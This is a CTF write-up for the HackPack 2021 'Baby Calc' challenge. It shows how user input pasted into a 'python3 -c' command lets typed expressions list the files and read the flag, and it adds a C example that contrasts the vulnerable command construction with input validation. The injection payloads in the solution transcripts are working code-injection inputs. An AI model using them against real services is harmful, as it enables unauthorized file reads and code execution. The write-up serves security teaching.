HackPack CTF 2021: Baby Calc

Baby Calc

Category: pwn

50 points

We put addition in the cloud!

nc ctf2021.hackpack.club 11001

Hint: Try debugging.

File: chal

Solution

The chall file looks like an ordinary binary ;-)

file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e5bdadade029e7e030196070fb434cf2d92bbbad, for GNU/Linux 3.2.0, with debug_info, not stripped

But after a few executions I realized it's apparently calling Python to perform the calculations.

./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: 1
Variable two: 2
3
./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: dsadas
Variable two: 4343
Traceback (most recent call last):
  File "<string>", line 1, in <module>
NameError: name 'dsadas' is not defined

Even without debugging or decompiling it became obvious.

strings chall | grep python
python3 -c 'print(%s + %s)'

Let’s exploit it :-) First I passed an empty string as the first argument and "".join(__import__("os").listdir()) as the second one, just to check where the flag is.

nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: "".join(__import__("os").listdir())
flagchal

OK, let’s read the flag's contents by passing the open("flag","rt").read() payload as the second argument.

nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: open("flag","rt").read()
flag{cL0uD_5Tr4tEgy}
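
The root cause is the format string found with strings: both operands are pasted into Python source, so whatever expression is typed gets evaluated. The following is an added example, not the challenge's source code; it assumes the binary fills that format string with the raw input, and build_command, parse_operand and safe_add are hypothetical names. It shows the vulnerable command construction next to a fix that accepts only decimal integers and adds them natively.

```c
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Format string recovered on the page with `strings chall`. */
#define CMD_FMT "python3 -c 'print(%s + %s)'"

/* Assumed vulnerable pattern: operands are pasted into Python source
 * unchanged, so any expression the user types is evaluated. */
int build_command(char *out, size_t n, const char *a, const char *b) {
    int len = snprintf(out, n, CMD_FMT, a, b);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Hardened: accept only an optionally signed decimal integer. */
int parse_operand(const char *s, long long *out) {
    char *end;
    if (s == NULL || *s == '\0') return -1;
    if (*s != '-' && *s != '+' && (*s < '0' || *s > '9')) return -1; /* strtoll would skip whitespace */
    errno = 0;
    long long v = strtoll(s, &end, 10);
    if (errno == ERANGE || end == s || *end != '\0') return -1;
    *out = v;
    return 0;
}

/* Add natively with an overflow check; no interpreter, no shell. */
int safe_add(const char *a, const char *b, long long *sum) {
    long long x, y;
    if (parse_operand(a, &x) != 0 || parse_operand(b, &y) != 0) return -1;
    if ((y > 0 && x > LLONG_MAX - y) || (y < 0 && x < LLONG_MIN - y)) return -1;
    *sum = x + y;
    return 0;
}

int main(void) {
    char cmd[256];
    long long sum;
    const char *payload = "open(\"flag\",\"rt\").read()"; /* operand from the page */
    if (build_command(cmd, sizeof cmd, "\"\"", payload) == 0)
        printf("vulnerable command: %s\n", cmd);
    printf("payload accepted by safe_add: %s\n",
           safe_add("\"\"", payload, &sum) == 0 ? "yes" : "no");
    if (safe_add("1", "2", &sum) == 0)
        printf("1 + 2 = %lld\n", sum);
    return 0;
}
```

parse_operand rejects a trailing newline, so a caller reading with fgets has to strip it first.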

Flag

flag{cL0uD_5Tr4tEgy}

luc © 2021